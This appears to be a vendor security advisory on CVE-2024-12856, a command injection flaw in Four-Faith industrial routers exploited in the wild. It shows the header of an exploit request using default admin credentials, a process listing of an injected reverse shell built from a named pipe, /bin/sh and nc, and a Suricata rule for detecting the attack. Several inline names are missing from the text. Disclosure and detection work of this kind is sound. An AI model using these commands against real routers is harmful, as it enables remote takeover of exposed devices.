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Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild

Jacob Baines@Junior_Baines

VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue CVE-2024-12856.

The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the

endpoint. Censys finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the
parameter when modifying the device’s system time via
. The following POST request demonstrates exploitation for a reverse shell.

POST /apply.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

On the device, the result of the injection can be observed using


20938 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20940 admin     1640 S    sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20942 admin     1636 S    cat WaO
20943 admin     1636 S    /bin/sh -i
20945 admin     1636 S    nc 1270

For those that have an encyclopedic memory for exploits, this vulnerability should not be confused with CVE-2019-12168. While both flow through the

endpoint, they attack different underlying components (CVE-2019-12168 attacks
and has an OS injection in the

VulnCheck observed 178.215.238[.]91 attempting to exploit this vulnerability. Additionally, we note that this November 2024 blog also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).

The VulnCheck Initial Access team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:

alert http any any -> any any ( \
    msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/apply.cgi"; startswith; \
    http.header_names; content:"Authorization"; \
    http.request_body; content:"change_action="; \
    content:"adjust_sys_time"; \
    pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
    classtype:web-application-attack; \
    reference:cve,CVE-2024-12856; \
    sid:12700438; rev:1;)

Finally, pursuant to our vulnerability disclosure policy for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.

About VulnCheck

The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. For more research like this, see our blogs, PaperCut Exploitation, ProjectSend CVE-2024-11680 Exploited in the Wild, Fileless Remote Code Execution on Juniper Firewalls , and Does Confluence Dream of Shells?

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